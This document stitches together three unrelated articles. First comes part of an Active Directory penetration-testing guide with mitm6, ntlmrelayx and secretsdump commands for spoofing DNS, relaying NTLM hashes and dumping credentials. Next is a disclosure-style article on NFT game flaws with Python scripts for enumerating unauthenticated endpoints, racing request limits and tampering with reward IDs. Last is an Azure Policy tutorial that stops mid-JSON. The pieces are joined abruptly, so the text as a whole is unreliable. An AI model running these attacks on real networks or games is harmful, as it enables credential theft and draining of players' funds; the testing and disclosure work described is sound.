By default, IPv6 is enabled and actually preferred over IPv4, meaning that if a machine has an IPv6 DNS server, it will use it over the IPv4 one. Also by default, Windows machines look for an IPv6 DNS server via DHCPv6 requests; if we answer those with a fake IPv6 DNS server, we can effectively control how a device queries DNS. The mitm6 tool starts by listening on the primary interface of the attacker machine for Windows clients requesting an IPv6 configuration via DHCPv6.

So we start mitm6, which will start replying to DHCPv6 requests and afterwards to DNS queries requesting names in the internal network:

mitm6 -d <domainname>.local

(Will spoof and assign rogue IPv6 DNS to victims)

IPv6 assigned to victim

If we do manage to intercept hashes with Responder or assign IPv6 addresses with mitm6, this automatically means we can add a new High risk finding to our report called "LLMNR/NetBIOS - DHCPv6 Spoofing". Finally, as we'll see below, we can have mitm6 and the NTLMrelayx tool handle the WPAD spoofing instead, so if you're running Responder at the same time, make sure it is not doing the same.
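For reference, a typical NTLMrelayx invocation that handles the WPAD side alongside mitm6 (in the style of the dirkjanm.io write-up in the references; the WPAD host name and target file are illustrative) looks like:

impacket-ntlmrelayx -6 -wh attacker-wpad -tf no-sign.txt -socks -smb2support

(Listens on IPv6 as well, serves a rogue WPAD file, and relays the resulting authentication to the hosts that don't require SMB signing)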

SMB Signing Not Required (Relaying)

Instead of cracking hashes with Hashcat to recover the cleartext password, you can relay them to specific machines and potentially gain access. In an SMB relay attack, the attacker captures a user's NetNTLM hash and relays it to another machine on the network, masquerading as the user and authenticating against SMB to gain shell or file access. A brief explanation of how this works:

A user requests access to a resource on a different device.  The remote device asks for a verification of the user’s identity by sending a random, 8-byte number to the client.  The client takes this number, takes the user’s password hash, performs a calculation on the number, and then sends that computed result back to the remote device.  The remote device checks that the result matches what it expects. If it gets a valid response, it allows the user access to the resource.

SMB relays are inserted in this authentication path, forwarding the requests and responses between the user’s client and a device the attacker actually wants access to.  An attacker selects the target and waits for something to authenticate to their attacking device (i.e. an already compromised client workstation). When something tries to access the attacking device with NTLM authentication, the attacking device forwards the authentication attempt to the target. The target generates the challenge request and sends it to the attacker. The attacker forwards that challenge back to the original device trying to authenticate to the attacking device. The original system encrypts the challenge with the correct hash and sends that to the attacking device. The attacking device then forwards the correctly encrypted response to the target and successfully authenticates, just as if the original device was authenticating to the target and not the attacking device.  

SMB signing verifies the origin and authenticity of SMB packets. Effectively, this stops man-in-the-middle SMB relay attacks from happening. If this is enabled and required on a machine, we will not be able to perform a SMB relay attack. By default, all Domain Controllers are configured to require SMB signing but all other hosts are not. 

First off we'll need a list of all SMB servers that do not require signing. We can grab these through Nessus, Nmap or Crackmapexec as we saw at the start of this guide.

Secondly, we will need a tool called NTLMrelayx, also included in our Kali Linux toolset, that will grab the hashes retrieved from Responder or mitm6 and relay them to hosts without SMB signing. Having said that, we need to be running either Responder or mitm6 at the same time in different tabs. We saw in the previous section how to use mitm6, and it needs no further configuration to run alongside NTLMrelayx. However, if you decide to use Responder instead to help with the relaying, you'll need to disable its SMB and HTTP servers in the configuration file (/usr/share/responder/Responder.conf), because NTLMrelayx needs those ports to do the relaying:

Disabling SMB & HTTP servers on Responder configuration
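In practice, the edited excerpt of that file looks roughly like this (the other servers stay On):

[Responder Core]

; Servers to start
SMB = Off
HTTP = Off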

NTLMrelayx will respond to broadcasts and listen for connections on port 445 and port 80. When there are LLMNR broadcasts, NTLMrelayx will relay them to hosts in the targets.txt file (the ones that don't require SMB signing). 

Next, we can start NTLMrelayx in a new tab alongside Responder or mitm6, but if we successfully manage to relay hashes, we will need to tweak some settings in order to interact with the victim hosts. The config file to tweak is /etc/proxychains4.conf on our Kali (make sure you're root). Go to the very end, comment out the localhost entry with port 9050 and add a new one with port 1080 instead. It should look like this:

Edit the Kali's proxychains4 like this
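The tail of /etc/proxychains4.conf then looks roughly like this (NTLMrelayx's SOCKS server listens on port 1080 by default):

[ProxyList]
# socks4  127.0.0.1 9050
socks4   127.0.0.1 1080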

Once this is done, feel free to run NTLMrelayx (again alongside with Responder or mitm6) on a different tab to try to relay those hashes.

impacket-ntlmrelayx -tf no-sign.txt -c "ipconfig" -socks -smb2support

(Will relay captured hashes to the hosts that don't require SMB signing (no-sign.txt), open SOCKS sessions and run "ipconfig" on successful relaying)

I have been receiving some errors recently from NTLMrelayx regarding Flask, so before you run it, make sure to upgrade Flask within the Kali as root:

apt-get update
apt-get install --only-upgrade python3-flask

If NTLMrelayx complains that port 1080 is in use, you can try killing it with: fuser -k 1080/tcp

Example:

NTLMrelayx running

NTLMrelayx will keep running and notify us when it has successfully relayed a hash. We can check this by pressing the RETURN key (ENTER) in the tab NTLMrelayx is running in and typing "socks". The hosts we managed to relay hashes to will show TRUE under the AdminStatus column:

NTLMRelayx managed to relay hash to 192.0.1.105

Now that we have an open session on this host, we could interact with it in various ways; however, for the sake of the assessment's timeframe and for lateral movement, we will attempt, as mentioned before, to dump hashes or cleartext passwords from memory. To do this, we will use the secretsdump tool, also found in the Impacket library. Open a new tab, unlock the Kali tools and edit your proxychains file as before; we will use the proxychains command to interact with the host and dump credentials:
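A hedged sketch of that step, assuming NTLMrelayx is holding an authenticated SOCKS session for an administrative user on the host from the previous figure (domain and username are placeholders; -no-pass is used because the relayed session already carries the authentication):

proxychains impacket-secretsdump <DOMAIN>/<RELAYED-USER>@192.0.1.105 -no-pass

(Dumps SAM hashes and LSA secrets through the SOCKS session NTLMrelayx keeps open on that host)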

Dumped cleartext password from a host we relayed hashes to

In the real world, the credentials you dump could well belong to a Domain Administrator, providing a quick win followed by extraction of NTDS.dit and further password analysis. If you have kept reading until now, you should have a solid idea of how to start with internal assessments and get your first foothold. Note that this guide is not exhaustive and there are other attacks you can research and utilize.

References:

https://hausec.com/pentesting-cheatsheet

https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin

https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i

https://xedex.gitbook.io/internalpentest/internal-pentest/active-directory/initial-attack-vectors/llmnr-nbt-ns-poisoning/smb-relay

https://bitvijays.github.io/LFF-IPS-P3-Exploitation.html

https://www.windows-commandline.com/add-user-to-domain-group

https://xedex.gitbook.io/internalpentest/internal-pentest/active-directory/initial-attack-vectors/ipv6-attacks/basic-attack

https://aas-s3curity.gitbook.io/cheatsheet/internalpentest/active-directory/exploitation/exploit-without-account/smb-relay

https://www.hackingarticles.in/lateral-moment-on-active-directory-crackmapexec/

https://abarrak.gitbook.io/linux-sysops-handbook/#shell-tips-and-tricks

https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/

https://mayfly277.github.io/assets/blog/pentest_ad.svg

https://github.com/Orange-Cyberdefense/arsenal/tree/master/mindmap

https://securityboulevard.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind/

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials

https://www.kitploit.com/2018/02/mitm6-pwning-ipv4-via-ipv6.html?m=0

https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/

https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/ldap-relay

https://hideandsec.sh/books/cheatsheets-82c/page/active-directory [cheatsheet]

https://hideandsec.sh/books/cheatsheets-82c/page/mssql [cheatsheet]

https://hideandsec.sh/books/cheatsheets-82c/page/wmi

by Marlon Fabiano of CySource

The success of the game Axie Infinity sparked a massive wave of Play to Earn games that has reached most of us. Until then, the term NFT, or non-fungible token, was only associated with images by famous artists like Beeple, or with the sought-after CryptoPunks collection. The privilege of making money by playing video games was restricted to big YouTubers and pro players. With Axie Infinity, however, the dream job of making money playing video games was opened to everyone: anyone can have fun playing and earning money with NFTs.

The idea of this dream job was so well received by the community at large that more and more games started popping up almost instantly, one after the other. A flood of games has been created, arguably more games than there are players aware of the possibility.

DeFi enables the delivery of financial services without the need for any intermediary, and Dapps enable the creation of decentralized applications on the blockchain. Taking advantage of this freedom, "NFT games" grew in the shadow of these concepts, since anyone could create a game without needing subject matter experts such as software developers, infrastructure engineers, or even security professionals. But from a security point of view, what does this mean?

Note: Many of the released NFT games are short-lived. Almost all ended before six months of existence, with a few exceptions.

It is worth remembering that NFT games are not just games. They are high-risk investments and should not be seen as easy money. Any investment must be analyzed by the investor in a technical and informed way.

About the anonymity

The two sides of anonymity:

Along with blockchain-based applications came the possibility of anonymity. There are many great projects whose developers and companies remain anonymous, but some scammers take advantage of this possibility to run their scams with even less exposure. This doesn't mean that a project is malicious just because it is anonymous; in the same way, a project that publishes the names and photos of its developers isn't necessarily a safe project either.

Anonymity is great for developers' protection. In many cases, even when the project is not a scam, if it goes south the developers can still be attacked by angry customers.

But what can you do when it is necessary to contact the company and the developers, who remain anonymous? What then? You're stuck. The closest thing to "support" for the game will be the mods (moderators) of its Telegram and Discord channels, and the moderators are often volunteers willing to run the communication channels, some of whom don't even have direct access to the developers. It is worth remembering that game mods are mostly just ordinary people who help control the so-called FUD (Fear, Uncertainty and Doubt) that can be spread by dissatisfied players, which can cause a herd effect that harms the game by making the token drop.

However, although this has made questioning actual problems in some games virtually impossible, it has allowed and encouraged all kinds of phrases, memes and anything else that speaks well of the game, even when false. That's why it's so common to see meme pictures of cars, houses, and celebrities with the message "Thank you + the name of the game" on these channels.

In this way, the channels remain almost like a cult in which it is only possible to say one thing: "this game is going to the moon". Going to the moon is a term used to describe stocks, cryptocurrencies, and NFTs that are expected to rise extremely high in value. Those who disagree are usually banned from the channels. Therefore, even if the game is going bankrupt, the repetition of positive phrases can bring in new players to serve as the base, recoup the losses, or generate more profit for the older players who entered first.

Risks in NFT games:

There are some known risks from an investment perspective, however, this article will not address those, and instead focus on the security aspect.

And from a security point of view, there are some well-known attacks designed to steal cryptocurrencies from the most unsuspecting:

Phishing: one of the best-known techniques in the cybersecurity world, in which attackers trick a victim into revealing their password in order to steal money or data. Here the idea is to make the victim connect their wallet to fraudulent websites or share sensitive information such as a private key or passphrase. The attacker can then access the victim's wallet and steal their cryptocurrencies.

In this case, the solution is to avoid connecting your wallet to unknown websites. Watch out for sites that try to imitate a DEX like PancakeSwap or a new game that is about to be released.

Rug pull: an attack similar to phishing, but a rug pull can come from a famous project that didn't work out or from large projects created to slowly steal from players, as was the recent case of three click games that had been selling the project tokens illicitly without the players' knowledge. A rug pull can also be built to spoof a real project, with liquidity added to the pool to make it look like a real token. After the victims buy the token, however, they are no longer able to sell it, as the token contract is written so that any selling wallet other than the project owner's must pay a fee - and that fee is 100%. As a result, there is nothing left from the sale, which causes an error at the time of selling, and the victim can no longer get their money back.

In this case, the solution is: always buy tokens through contracts linked from the project website. Even this does not guarantee that the project is not a rug pull, so do other validations: check the liquidity in the pool, and check whether sales come from different wallets rather than from the project owner's wallet. Beware of an abnormal appreciation from 0x to 20x in a few hours, as this kind of "skyrocketing" could very well be a scam. Check all the project's wallets to see whether the developers are able to sell their tokens at any time in the so-called "pull of the rug".

About Blockchain security:

When we think of blockchains, we have the idea of security and immutability. So, are NFT games that are built on the blockchain safe?

First, let's think about the basics of the idea of an NFT.

When you buy an avatar NFT, you are buying ownership of it. So, as a "non-fungible token", nobody but you has access to that avatar, right? Wrong! Anyone can access your avatar image, download it and modify it locally so that it becomes another NFT, and can later sell it. But this will not change your already purchased avatar in any way.

So, can we conclude that your avatar would be immutable?

To understand this, we need to realize that what we bought was not the image but the hash that references it: the transaction now simply records the buyer's wallet as the new owner. The image itself sits on a host running a web server, like any other ordinary host. So, if a hacker breaks into that server, they can change your avatar to a picture of a guy with a horse's head, for example. That doesn't seem so immutable.

A recent proof of concept by Moxie Marlinspike showed us that "immutable" can be a bit of a misconception. In the test, Moxie created an NFT whose image was hosted on a server he controlled, and depending on the IP or User-Agent of the request, the server returned a different image: OpenSea was shown one picture, Rarible another, and the buyer's own wallet yet another, all for the same reference hash.
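
To make the trick concrete, here is a minimal Python/Flask sketch of that kind of server (the route and image file names are hypothetical): the same NFT URL returns a different picture depending on who asks for it.

# Hypothetical sketch of a host that serves different content for the same NFT URL
# depending on the requester, illustrating the proof of concept described above.
from flask import Flask, request, send_file

app = Flask(__name__)

@app.route("/nft/<token_id>.png")
def nft_image(token_id):
    ua = request.headers.get("User-Agent", "").lower()
    # Marketplaces and wallets fetch the image with their own clients, so the
    # User-Agent (or the source IP) is enough to tell them apart.
    if "opensea" in ua:
        return send_file("image_for_opensea.png")    # hypothetical file names
    if "rarible" in ua:
        return send_file("image_for_rarible.png")
    return send_file("image_for_everyone_else.png")  # what the buyer's wallet sees

if __name__ == "__main__":
    app.run(port=8080)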

Now, bringing NFTs into the world of Play to Earn, we have the concept of NFT games. But the "NFTs" of these games can be fungible, just like any token. Recent play-to-earn titles such as Bombcrypto, LunaRush and CryptoShips all arrive with the idea of working with NFTs, but what we see is an even looser use of the concept than before. In these games, it is quite common to see one player holding the same NFT as another player; the only difference is the player’s ID. So, just as we saw earlier, the player doesn't really buy the hero, item or skin, he only buys an ID. IDs and unique identifiers are something we've seen for a long time in the ordinary applications we use daily. So, from a security point of view, can the same vulnerabilities that affect classic applications built on unique identifiers also affect NFT games?

As a case study, Cysource randomly chose some NFT games for a technical analysis.

Monsta Infinite

Starting with the Monsta Infinite game:

This game is very similar to Axie Infinity, but had not yet been released at the time of writing.

Describing the vulnerability:

When the sale of monster eggs opened, it was possible to choose the ID of the egg to be purchased, just like in a store. This is great for giving the player a sense of choice. The problem appeared when we tried to open (or "incubate", as they call it) the egg. Let's analyze the NFT opening request:

POST /hatch HTTP/2
Host: REDACTED.execute-api.ap-southeast-1.amazonaws.com
Content-Length: 15
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json
Dnt: 1
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://marketplace.monstainfinite.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://marketplace.monstainfinite.com/
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en;q=0.8,es;q=0.7

{"token_id":1337}

We can see the first problem in the request: there is no token of any kind to authenticate and authorize the opening of the egg. Anyone could hatch the NFT without logging in with their wallet. Seeing the contents of each ID may not sound very impactful, but since each ID carries a specific combination of powers, stats and "purity" (the rarity of monster parts), it becomes extremely impactful: an attacker could see exactly what an NFT contained before buying it, cherry-pick and buy all the most valuable ones, and resell them later at a high price as the sole holder of the rarer NFTs.
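
To illustrate the impact, here is a short Python sketch of how such a missing check could be abused; it simply replays the captured request with different IDs (the host stays redacted, and the ID range is made up for the example):

# Sketch: enumerating egg contents through the unauthenticated /hatch endpoint.
# The host is redacted as in the captured request; the token_id range is illustrative.
import requests

API = "https://REDACTED.execute-api.ap-southeast-1.amazonaws.com/hatch"

for token_id in range(1, 51):
    resp = requests.post(API, json={"token_id": token_id}, timeout=10)
    if resp.ok:
        # No cookie, JWT or wallet signature is required, so anyone can inspect
        # the stats and "purity" of an egg before deciding whether to buy it.
        print(token_id, resp.json())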

PoC:

Opening unbought NFTs
Viewing the contents of the referenced ID

The vulnerability was reported to the game's mods and has since been patched.

Monster Grand Prix

Another game that was chosen for the case study was MonsterGrandPrix, which lasted a short time.

The game was a click game that allowed two races a day for each tamer + monster duo. To play, the player needed to invest 170 dollars to buy one tamer and one monster to race, and depending on the position in which the race ended, he was rewarded with more or fewer $MGPX tokens.

MonsterGrandPrix NFT
players racing

Every time we ran a race, the following request was sent:

POST /api/v1/game/play_racinggame HTTP/2
Host: app.monstergrandprix.io
Cookie: token=REDACTED_JWT; __cf_bm=cookie
Content-Length: 35
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json, text/plain, */*
Dnt: 1
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://app.monstergrandprix.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://app.monstergrandprix.io/
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en;q=0.8,es;q=0.7
Connection: close

{"monsterId":631337,"tamerId":601337}

And we received the answer with the result of the race, informing us what happened during it (the powers of the monsters used) and the position in which our monster finished.

Exploiting a misconfiguration in the traffic limit control, we sent several requests directly to the API; by the time the backend registered that we had already done our two runs of the day, we had managed to perform dozens of runs.

Taking the day's average price, it was possible to earn 70 dollars for every 10 requests sent to the API. In just a few requests it would be possible to make a considerable profit and drain the liquidity of the entire game pool.
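
In other words, the per-day race counter was enforced too slowly on the backend, so a burst of requests slipped through before it caught up. A rough Python sketch of that kind of burst, reusing the shape of the captured request (the JWT cookie and the IDs are placeholders):

# Sketch: send a burst of /play_racinggame requests before the backend's
# per-day race counter catches up. The cookie value and IDs are placeholders.
import requests
from concurrent.futures import ThreadPoolExecutor

URL = "https://app.monstergrandprix.io/api/v1/game/play_racinggame"
COOKIES = {"token": "REDACTED_JWT"}
BODY = {"monsterId": 631337, "tamerId": 601337}

def play(_):
    resp = requests.post(URL, json=BODY, cookies=COOKIES, timeout=10)
    return resp.status_code, resp.text[:80]

with ThreadPoolExecutor(max_workers=20) as pool:
    for status, snippet in pool.map(play, range(50)):
        print(status, snippet)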

It is worth considering that the value of the token reached almost 200 dollars:

MGPX token value on test day

We tried to report the vulnerability to the game mods, as the developers were anonymous, but we got no response. According to later announcements, the game had all the liquidity in its pool stolen (which some people believe was a ploy by the developers themselves), and after the third version of the token was created, the game shut down. This made many players think the game was never intended to be a real play-to-earn title but was always a rug pull. However, as we are only showing vulnerabilities involving the game and not analyzing the contract or the project itself, we will not weigh in on whether it was a scam.

PoC:

{
 "status" : {
   "code" : "200" ,
   "message" : ""
},
 "date" : [
{
     "id" : "48003ddf-8c3e-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 4 ,
     "createdAt" : "2021-11-03T20:18:14.515Z" ,
     "updatedAt" : "2021-11-03T20:18:14.516Z" ,
     "amount" : "0.1241" ,
     "accountType" : "C"
},
{
     "id" : "41941a5f-34c8-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 6 ,
     "createdAt" : "2021-11-03T20:18:14.505Z" ,
     "updatedAt" : "2021-11-03T20:18:14.505Z" ,
     "amount" : "0.0887" ,
     "accountType" : "C"
},
{
     "id" : "2159e65a-a354-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 4 ,
     "createdAt" : "2021-11-03T20:18:14.501Z" ,
     "updatedAt" : "2021-11-03T20:18:14.501Z" ,
     "amount" : "0.1241" ,
     "accountType" : "C"
},
{
     "id" : "bf302a55-1060-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 4 ,
     "createdAt" : "2021-11-03T20:18:14.483Z" ,
     "updatedAt" : "2021-11-03T20:18:14.483Z" ,
     "amount" : "0.1241" ,
     "accountType" : "C"
},
{
     "id" : "0d73be2b-1a31-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 3 ,
     "createdAt" : "2021-11-03T20:18:14.471Z" ,
     "updatedAt" : "2021-11-03T20:18:14.471Z" ,
     "amount" : "0.1419" ,
     "accountType" : "C"
},
{
     "id" : "b79a89ab-4f78-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 5 ,
     "createdAt" : "2021-11-03T20:18:14.458Z" ,
     "updatedAt" : "2021-11-03T20:18:14.459Z" ,
     "amount" : "0.1064" ,
     "accountType" : "C"
},
{
     "id" : "1e6334a1-4707-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 4 ,
     "createdAt" : "2021-11-03T20:18:14.443Z" ,
     "updatedAt" : "2021-11-03T20:18:14.444Z" ,
     "amount" : "0.1241" ,
     "accountType" : "C"
},
{
     "id" : "f62c83dd-23c8-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 7 ,
     "createdAt" : "2021-11-03T20:18:14.423Z" ,
     "updatedAt" : "2021-11-03T20:18:14.424Z" ,
     "amount" : "0.0532" ,
     "accountType" : "C"
},
{
     "id" : "ea8bc7e2-66ca-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 7 ,
     "createdAt" : "2021-11-03T20:18:14.405Z" ,
     "updatedAt" : "2021-11-03T20:18:14.405Z" ,
     "amount" : "0.0532" ,
     "accountType" : "C"
},
{
     "id" : "5704ea40-bd6e-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 6 ,
     "createdAt" : "2021-11-03T20:18:14.370Z" ,
     "updatedAt" : "2021-11-03T20:18:14.370Z" ,
     "amount" : "0.0887" ,
     "accountType" : "C"
},
{
     "id" : "1563d8d0-3e79-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 6 ,
     "createdAt" : "2021-11-03T20:18:14.347Z" ,
     "updatedAt" : "2021-11-03T20:18:14.347Z" ,
     "amount" : "0.0887" ,
     "accountType" : "C"
},

RiseCity

We identified another flaw in the game RiseCity. This game intended to bring back old resource-management games like SimCity, but with the promise that it would pay players for their efforts to keep the city running.

RiseCity

The reward was based on the type of house the player owned. However, at the time of claiming the reward, it was possible to change the rarity ID of the NFT and thus obtain greater profits than should have been received. We tried to contact the game's developer in several ways, but got no answer. The game was exploited in so many different ways that an "arrest" NFT was eventually issued to wallets accused of hacking or exploiting the rewards.
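
We cannot reproduce the original traffic here, but the tampering amounts to replaying the reward claim with a different rarity identifier. A purely hypothetical Python sketch (the endpoint, parameter names and values are invented for illustration):

# Hypothetical sketch of the rarity-ID tampering: replay the reward claim with a
# higher rarity than the NFT actually has. Endpoint and field names are invented.
import requests

CLAIM_URL = "https://risecity.example.invalid/api/claim"   # placeholder endpoint
session = requests.Session()
session.cookies.set("token", "PLAYER_JWT")                 # placeholder session

# The client really owns a common house (rarityId 1), but claims as a rarer one.
tampered_claim = {"houseId": 1234, "rarityId": 5}

resp = session.post(CLAIM_URL, json=tampered_claim, timeout=10)
print(resp.status_code, resp.text[:120])
# If the backend trusts the client-supplied rarityId instead of looking the house
# up in its own records (or on-chain), the payout is computed from the forged value.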

TurtleRacing

In the TurtleRacing game, which is based on the tale of "The Tortoise and the Hare", players buy their NFTs and race against other turtles in search of the $TURT token.

TurtleRacing

We identified a way to bypass the per-NFT race control, which allowed only two races a day, and were able to perform more races than permitted, thus increasing the earnings from each NFT.

Races held by the same NFT, exceeding the two-race limit

The vulnerability was reported to one of the project's mods who understood the impact and managed a direct bridge with the game's developers. The developers thanked us for the report and fixed the vulnerability as quickly as possible.

Conclusion:

What NFT games have brought is remarkable, giving people the (so far hypothetical) possibility of making a profit from home in this time of pandemic. Mothers who take care of their children during the day can simultaneously play games to earn extra income. People from relatively poor places can change their lives and live better. Anything that helps people become a better version of themselves should be admired.

However, we cannot ignore the fact that games are appearing from all over the world, trying to get a share of this lucrative (and risky) market, and that these games hardly ever care about security.

In this way, a single person could end an entire game or walk away with the liquidity of the whole pool. This was the case with the game CryptoBurger, in which the developers failed to restrict who could call the burn function. This allowed a hacker to burn all the tokens in the pool (https://poocoin.app/tokens/0xf40d33de6737367a1ccb0ce6a056698d993a17e1) and then sell his own tokens at a high price for a considerable profit.

Similarly, a lack of security can expose your NFTs to other malicious actors who can profit illegally through exploits, causing the game to "bleed" to destruction.

What we want to point out is that contract auditing must be performed to identify logic and security errors, but also that the contract is integrated with a frontend and a backend. Smart-contract security doesn't mean much if the application around it is vulnerable, and those vulnerabilities can leave both the developers and their players exposed.

by Almu Gómez Sánchez-Paulete

When we talk about cybersecurity, the image of a person with a hood in front of black screens and white lines (or green, which are cooler) comes to mind, and we don’t always take into account that cybersecurity encompasses much more than knowing how to attack a system (Red Team). It is also important to design a secure architecture and know how to apply compliance controls to help carry out a risk plan and manage vulnerabilities in the infrastructure. If you add a cloud architecture, we find ourselves with the exciting world of “Cybersecurity Compliance on Cloud”.

Cybersecurity compliance ranges from legal controls over the confidentiality, integrity and availability of data to the use of tools and the application of processes that help enforce those controls.

In a cloud-based architecture with Microsoft Azure, we have multiple tools that will help us in this process (Azure Role Based Access Control, Azure Group Administration, Azure Blueprints...). In this first article, we will talk about Azure Policies and how they can help us monitor the compliance of our infrastructure.

These tools fall under the control of Azure Governance, which, in general terms, is the way to control how a group of users access certain resources, and for how long.

The first thing is to know what Azure Policies are and how they can help us.

They are a series of rules that will help us maintain consistency in the infrastructure.

What can lead us to make use of them?

  • Regulatory compliance
  • Cost control
  • Consistency in security and performance

These rules will allow the following actions to be carried out once they are evaluated:

  • Append
  • Audit
  • AuditIfNotExists
  • Deny
  • DeployIfNotExists
  • Disabled
  • Modify

For example, if we don't want any resources to be deployed in the “Test” resource group without the “test” tag and value, the rule will deny the deployment. This is useful in large infrastructures where different teams work side by side on one or several subscriptions that have to meet a minimum structure defined by the organization.

This service has no additional cost, and by default Azure provides a series of ready-made policies that you only need to assign, indicating the action to be taken.

These rules can be grouped into sets called "initiatives", some of which Azure also offers by default for checking compliance with certain standards, such as NIST or the CIS Microsoft Azure Benchmark:

Also, you can create your own sets of rules so that with a simple assignment on a subscription, or group of resources, you can control all the rules you require.

But we are going to focus on the possibility of creating custom Azure Policies for our environment. For this, we have to know:

  • What language do you use? JSON
  • What permissions does the user require to manage these policies?

All of the following operations are of action type "Action":

  • Microsoft.Authorization/policyDefinitions/read: Get information about a policy definition.
  • Microsoft.Authorization/policyDefinitions/write: Create a custom policy definition.
  • Microsoft.Authorization/policyDefinitions/delete: Delete a policy definition.
  • Microsoft.Authorization/policyAssignments/read: Get information about a policy assignment.
  • Microsoft.Authorization/policyAssignments/write: Create a policy assignment at the specified scope.
  • Microsoft.Authorization/policyAssignments/delete: Delete a policy assignment at the specified scope.
  • Microsoft.Authorization/policyExemptions/*: Create and manage policy exemptions.
  • Microsoft.Authorization/policySetDefinitions/*: Create and manage policy sets.

What parts does a policy in JSON format consist of? The code has two distinct parts:

  • The declaration of the rules: determines how the policy will behave (its effect) once its condition is fulfilled
  • The declaration of the parameters: the definition of the values that the policy must comply with.

With these clear points, let's get down to business!

We are going to create a simple custom policy that forces a tag to be set on resources. To do this, we will write the JSON, then import it into our Azure account with PowerShell, and finally verify from the Azure Portal that it has been created correctly.

First, we will create two files:

  • parameters.json
  • rules.json

In the parameters.json file, we will define the default value of the tag that we require with this rule; in our case, it will be the value “test”.

{
  "tagName": {
    "type": "String",
    "metadata": {
      "displayName": "Mandatory Tag [test]",
      "description": "Name of the tag, such as [test]"
    },
    "defaultValue": "test"
  },
  "effect": {
    "type": "String",
    "defaultValue": "Deny",
    "allowedValues": [
      "Audit",
      "Deny",
      "Disabled"
    ],
    "metadata": {
      "displayName": "Effect",
      "description": "The effect determines what happens when the policy rule is evaluated to match"
    }
  }
}

In the rules.json file, we define the condition (the tag does not exist) and the effect to apply:

{
  "if": {
    "allOf": [
      {
        "field": "[concat('tags[', parameters('tagName'), ']')]",
        "exists": "false"
      }
    ]
  },
  "then": {
